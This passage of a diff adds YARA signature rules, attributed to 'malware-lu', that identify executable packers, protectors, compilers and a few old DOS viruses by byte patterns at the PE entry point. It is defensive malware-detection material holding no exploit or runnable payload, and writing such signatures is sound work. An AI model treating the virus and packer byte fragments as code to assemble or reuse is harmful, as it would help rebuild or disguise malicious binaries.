+		$a0 = { 06 57 1E 56 55 52 51 53 50 2E ?? ?? ?? ?? 8C C0 05 ?? ?? 2E ?? ?? ?? 8E D8 A1 ?? ?? 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASProtectv12x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 68 01 ?? ?? ?? C3 AA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Packanoidv1Arkanoid
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF ?? ?? ?? ?? BE ?? ?? ?? ?? E8 9D 00 00 00 B8 ?? ?? ?? ?? 8B 30 8B 78 04 BB ?? ?? ?? ?? 8B 43 04 91 E3 1F 51 FF D6 56 96 8B 13 8B 02 91 E3 0D 52 51 56 FF D7 5A 89 02 83 C2 04 EB EE 83 C3 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EscargotV01Meat
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 40 30 2E 31 60 68 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SCObfuscatorSuperCRacker
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 33 C9 8B 1D 00 ?? ?? ?? 03 1D 08 ?? ?? ?? 8A 04 19 84 C0 74 09 3C ?? 74 05 34 ?? 88 04 19 41 3B 0D 04 ?? ?? ?? 75 E7 A1 08 ?? ?? ?? 01 05 0C ?? ?? ?? 61 FF 25 0C }
+
+condition:
+		$a0
+}
+	
+	
+rule EXEStealth275WebtoolMaster
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PasswordProtectorcMiniSoft1992
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 0E 0E 07 1F E8 00 00 5B 83 EB 08 BA 27 01 03 D3 E8 3C 02 BA EA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEddie2000
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 50 06 56 1E 8B FE 33 C0 50 8E D8 C5 ?? ?? ?? B4 30 CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VideoLanClientUnknownCompiler
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXPressorv14CGSoftLabs
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 EC ?? 53 56 57 EB 0C 45 78 50 72 2D 76 2E 31 2E 34 2E 2E B8 }
+	$a1 = { 65 58 50 72 2D 76 2E 31 2E 34 2E }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule SkDUndetectablerPro20NoUPXMethodSkD
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD FF FF E8 BB ED FF FF 8D 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RJcrushv100
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 FC 8C C8 BA ?? ?? 03 D0 52 BA ?? ?? 52 BA ?? ?? 03 C2 8B D8 05 ?? ?? 8E DB 8E C0 33 F6 33 FF B9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeShieldv27
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 F4 86 06 00 C3 9C 60 E8 02 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ExeShieldv29
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 0B 20 40 00 B9 EB 08 00 00 8D BD 53 20 40 00 8B F7 AC ?? ?? ?? F8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEiDBundlev102v103BoBBobSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 ?? ?? ?? 2E ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 80 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC5060
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 D2 0F BE D2 EB 01 C7 EB 01 D8 8D 05 80 ?? ?? ?? EB 02 CD 20 EB 01 F8 BE F4 00 00 00 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PUNiSHERV15FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3F 00 00 80 66 20 ?? 00 7E 20 ?? 00 92 20 ?? 00 A4 20 ?? 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 }
+
+condition:
+		$a0
+}
+	
+	
+rule ExcaliburV103forgot
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8 58 61 EB 39 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack10betaap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 F9 01 00 00 89 85 48 02 00 00 5B FF B5 }
+	$a1 = { 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 F9 01 00 00 89 85 48 02 00 00 5B FF B5 48 02 00 00 56 FF D3 83 C4 08 8B B5 48 02 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 83 C0 04 89 85 44 02 00 00 EB 7A 56 FF 95 F1 01 00 00 89 85 40 02 00 00 8B C6 EB 4F 8B 85 44 02 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 44 02 00 00 C7 00 20 20 20 00 EB 06 FF B5 44 02 00 00 FF B5 40 02 00 00 FF 95 F5 01 00 00 89 07 83 C7 04 8B 85 44 02 00 00 EB 01 40 80 38 00 75 FA 40 89 85 44 02 00 00 80 38 00 75 AC EB 01 46 80 3E 00 75 FA 46 40 8B 38 83 C0 04 89 85 44 02 00 00 80 3E 01 75 81 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 48 02 00 00 FF 95 FD 01 00 00 61 68 ?? ?? ?? ?? C3 60 8B 74 24 24 8B 7C }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule nMacrorecorder10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5C 6E 6D 72 5F 74 65 6D 70 2E 6E 6D 72 00 00 00 72 62 00 00 58 C7 41 00 10 F8 41 00 11 01 00 00 00 00 00 00 46 E1 00 00 46 E1 00 00 35 00 00 00 F6 88 41 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule PrivateEXEv20a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 E8 00 00 00 00 5B 8B C3 2D }
+	$a1 = { 06 60 C8 ?? ?? ?? 0E 68 ?? ?? 9A ?? ?? ?? ?? 3D ?? ?? 0F ?? ?? ?? 50 50 0E 68 ?? ?? 9A ?? ?? ?? ?? 0E }
+	$a2 = { 53 E8 ?? ?? ?? ?? 5B 8B C3 2D ?? ?? ?? ?? 50 81 ?? ?? ?? ?? ?? 8B }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule PackmanV10BrandonLaCombe
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5B 8D 5B C6 01 1B 8B 13 8D 73 14 6A 08 59 01 16 AD 49 75 FA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01PEX099Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 55 83 C4 04 E8 01 00 00 00 90 5D 81 FF FF FF 00 01 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PAKSFXArchive
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 ?? ?? A1 ?? ?? 2E ?? ?? ?? 2E ?? ?? ?? ?? ?? 8C D7 8E C7 8D ?? ?? BE ?? ?? FC AC 3C 0D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv2xxAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }
+	$a1 = { A8 03 ?? ?? 61 75 08 B8 01 ?? ?? ?? C2 0C ?? 68 ?? ?? ?? ?? C3 8B 85 26 04 ?? ?? 8D 8D 3B 04 ?? ?? 51 50 FF 95 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule SimbiOZ13Extranger
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 57 57 8D 7C 24 04 50 B8 00 ?? ?? ?? AB 58 5F C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule muckisprotectorImucki
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8A 06 F6 D0 88 06 46 E2 F7 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1339ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule LOCK98V10028keenvim
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 00 00 00 00 5D 81 ?? ?? ?? ?? ?? EB 05 E9 ?? ?? ?? ?? EB 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule iPBProtectv013
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 4B 43 55 46 68 54 49 48 53 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 FA 33 DB 89 5D F8 6A 02 EB 01 F8 58 5F 5E 5B 64 8B 25 00 00 00 00 64 8F 05 00 00 00 00 58 58 58 5D 68 9F 6F 56 B6 50 E8 5D 00 00 00 EB FF 71 78 }
+
+condition:
+		$a0
+}
+	
+	
+rule PrivateEXEProtector197SetiSoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F4 FC 53 57 56 8B 74 24 20 8B 7C 24 24 66 81 3E 4A 43 0F 85 A5 02 00 00 83 C6 0A 33 DB BA 00 00 00 80 C7 44 24 14 08 00 00 00 43 8D A4 24 00 00 00 00 8B FF 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 73 2C 8B 4C 24 10 33 C0 8D A4 24 00 00 00 00 05 00 00 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 02 44 24 0C 88 07 47 EB C6 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 0F 82 6E 01 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 0F 83 DC 00 00 00 B9 04 00 00 00 33 C0 8D A4 24 00 00 00 00 8D 64 24 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 48 74 B1 0F 89 EF 01 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 73 42 BD 00 01 00 00 B9 08 00 00 00 33 C0 8D A4 24 00 00 00 00 05 00 00 00 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 13 C0 49 75 EF 88 07 47 4D 75 D6 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASPackv21AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv103bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 87 25 ?? ?? ?? ?? 61 94 55 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner01PEIntro10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8B 04 24 9C 60 E8 14 00 00 00 5D 81 ED 0A 45 40 90 80 BD 67 44 40 90 90 0F 85 48 FF ED 0A E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv099SpecialBuildheXerforgot
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05 ?? ?? 00 F5 ?? ?? 00 ED ?? ?? 00 00 00 00 00 00 00 00 00 12 ?? ?? 00 FD ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00 }
+	$a1 = { E9 5E DF FF FF 00 00 00 ?? ?? ?? ?? E5 ?? ?? 00 00 00 00 00 00 00 00 00 05 ?? ?? 00 F5 ?? ?? 00 ED ?? ?? 00 00 00 00 00 00 00 00 00 12 ?? ?? 00 FD ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00 00 00 00 1D ?? ?? 00 00 00 00 00 30 ?? ?? 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule VxBackfont900
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? B4 30 CD 21 3C 03 ?? ?? B8 ?? ?? BA ?? ?? CD 21 81 FA ?? ?? ?? ?? BA ?? ?? 8C C0 48 8E C0 8E D8 80 ?? ?? ?? 5A ?? ?? 03 ?? ?? ?? 40 8E D8 80 ?? ?? ?? 5A ?? ?? 83 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CrunchPEv20xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 55 BB ?? ?? ?? ?? 03 DD 53 64 67 FF 36 ?? ?? 64 67 89 26 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Litev003a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 06 FC 1E 07 BE ?? ?? ?? ?? 6A 04 68 ?? 10 ?? ?? 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack1XMethod2bagie
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 4D 5A 90 EB 01 00 52 E9 ?? 01 00 00 50 45 00 00 4C 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 E0 00 0F 03 0B 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 00 00 00 00 ?? ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule PEncryptv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C BE 00 10 40 00 8B FE B9 28 03 00 00 BB 78 56 34 12 AD 33 C3 AB E2 FA 9D 61 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule BJFntv12RC
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 69 B1 83 EC 04 EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FishPEShield112116HellFish
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 D0 53 56 57 8B 45 10 83 C0 0C 8B 00 89 45 DC 83 7D DC 00 75 08 E8 BD FE FF FF 89 45 DC E8 E1 FD FF FF 8B 00 03 45 DC 89 45 E4 E8 DC FE FF FF 8B D8 BA 8E 4E 0E EC 8B C3 E8 2E FF FF FF 89 45 F4 BA 04 49 32 D3 8B C3 E8 1F FF FF FF 89 45 F8 BA 54 CA AF 91 8B C3 E8 10 FF FF FF 89 45 F0 BA AC 33 06 03 8B C3 E8 01 FF FF FF 89 45 EC BA 1B C6 46 79 8B C3 E8 F2 FE FF FF 89 45 E8 BA AA FC 0D 7C 8B C3 E8 E3 FE FF FF 89 45 FC 8B 45 E4 8B 58 04 03 5D E4 8B FB 8B 45 E4 8B 30 4E 85 F6 72 2B }
+	$a1 = { 60 E8 EA FD FF FF FF D0 C3 8D 40 00 ?? 00 00 00 2C 00 00 00 ?? ?? ?? 00 ?? ?? 00 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 ?? ?? 00 ?? ?? 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 00 00 ?? ?? ?? 00 40 ?? ?? ?? 00 00 ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 40 ?? ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 40 }
+
+condition:
+		$a0 or $a1 at pe.entry_point
+}
+	
+	
+rule CodeCryptv016bv0163b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VOBProtectCD
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 5F 81 EF ?? ?? ?? ?? BE ?? ?? 40 ?? 8B 87 ?? ?? ?? ?? 03 C6 57 56 8C A7 ?? ?? ?? ?? FF 10 89 87 ?? ?? ?? ?? 5E 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule diProtectorV1XdiProtectorSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 01 00 A0 E3 14 00 00 EB 00 00 20 E0 44 10 9F E5 03 2A A0 E3 40 30 A0 E3 AE 00 00 EB 30 00 8F E5 00 20 A0 E1 3A 0E 8F E2 00 00 80 E2 1C 10 9F E5 20 30 8F E2 0E 00 00 EB 14 00 9F E5 14 10 9F E5 7F 20 A0 E3 C5 00 00 EB 04 C0 8F E2 00 F0 9C E5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PrivateexeProtector20SetiSoftTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule AHTeamEPProtector03fakekkryptor9kryptoraFEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 60 E8 ?? ?? ?? ?? 5E B9 00 00 00 00 2B C0 02 04 0E D3 C0 49 79 F8 41 8D 7E 2C 33 46 ?? 66 B9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEBundlev310
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 20 40 00 87 DD ?? ?? ?? ?? 40 00 01 }
+
+condition:
+		$a0
+}
+	
+	
+rule NsPack34NorthStar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC280290EXEX86CRTLIB
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC ?? 83 EC ?? 53 56 57 89 65 E8 68 00 00 00 ?? E8 ?? ?? ?? ?? 59 A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV115V117Dllap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 80 7C 24 08 01 0F 85 ?? 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC28x45xPelleOrinius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 83 EC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Thinstallv2460Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 51 53 56 57 6A 00 6A 00 FF 15 F4 18 40 00 50 E8 87 FC FF FF 59 59 A1 94 1A 40 00 8B 40 10 03 05 90 1A 40 00 89 45 FC 8B 45 FC FF E0 5F 5E 5B C9 C3 00 00 00 76 0C 00 00 D4 0C 00 00 1E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110Engdulekxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 ?? BF ?? 10 40 ?? BE }
+	$a1 = { E8 01 00 00 00 ?? ?? E8 ?? 00 00 00 }
+	$a2 = { EB 01 ?? EB 02 ?? ?? ?? 80 ?? ?? 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule PECompactv2xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 00 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 33 C0 89 08 50 45 43 6F 6D 70 61 63 74 32 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule ASPackv10802AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillo440SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 31 2E 31 2E 34 00 00 00 C2 E0 94 BE 93 FC DE C6 B6 24 83 F7 D2 A4 92 77 40 27 CF EB D8 6F 50 B4 B5 29 24 FA 45 08 04 52 D5 1B D2 8C 8A 1E 6E FF 8C 5F 42 89 F1 83 B1 27 C5 69 57 FC 55 0A DD 44 BE 2A 02 97 6B 65 15 AA 31 E9 28 7D 49 1B DF B5 5D 08 A8 BA A8 }
+
+condition:
+		$a0
+}
+	
+	
+rule Armadillov1xxv2xx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule HACKSTOPv111c
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 CD 21 86 E0 3D ?? ?? 73 ?? B4 ?? CD 21 B0 ?? B4 4C CD 21 53 BB ?? ?? 5B EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEStealth276UnregisteredWebtoolMaster
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02LCCWin32DLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 83 7D 0C 01 75 05 E8 17 90 90 90 FF 75 10 FF 75 0C FF 75 08 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CDSSSv10Beta1CyberDoomTeamX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED CA 47 40 00 FF 74 24 20 E8 D3 03 00 00 0B C0 0F 84 13 03 00 00 89 85 B8 4E 40 00 66 8C D8 A8 04 74 0C C7 85 8C 4E 40 00 01 00 00 00 EB 12 64 A1 30 00 00 00 0F B6 40 02 0A C0 0F 85 E8 02 00 00 8D 85 F6 4C 40 00 50 FF B5 B8 4E 40 00 E8 FC 03 00 00 0B C0 0F 84 CE 02 00 00 E8 1E 03 00 00 89 85 90 4E 40 00 8D 85 03 4D 40 00 50 FF B5 B8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv041x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 8B C0 8D 24 24 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 50 8B FE 68 78 01 ?? ?? 59 EB 01 EB AC 54 E8 03 ?? ?? ?? 5C EB 08 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ZCodeWin32PEProtectorv101
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 12 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E9 FB FF FF FF C3 68 ?? ?? ?? ?? 64 FF 35 }
